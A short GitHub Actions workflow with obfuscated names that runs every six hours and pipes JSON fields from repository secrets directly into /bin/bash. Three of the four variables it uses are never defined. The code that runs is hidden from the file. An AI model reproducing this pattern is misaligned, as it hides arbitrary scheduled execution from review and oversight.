name: caijingcheng0987
on:
  workflow_dispatch:
  schedule:
    - cron: '6 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caijingcheng0987
        env:
          k54258: ${{ secrets.k54258 }}
        run: |
          echo $k54258 | jq -r .smz76 | /bin/bash
          echo $ytzj85 | jq -r .y0205 | /bin/bash
          echo $qdfs3 | jq -r .ylqwt655 | /bin/bash
          echo $ideus20266 | jq -r .c54 | /bin/bash

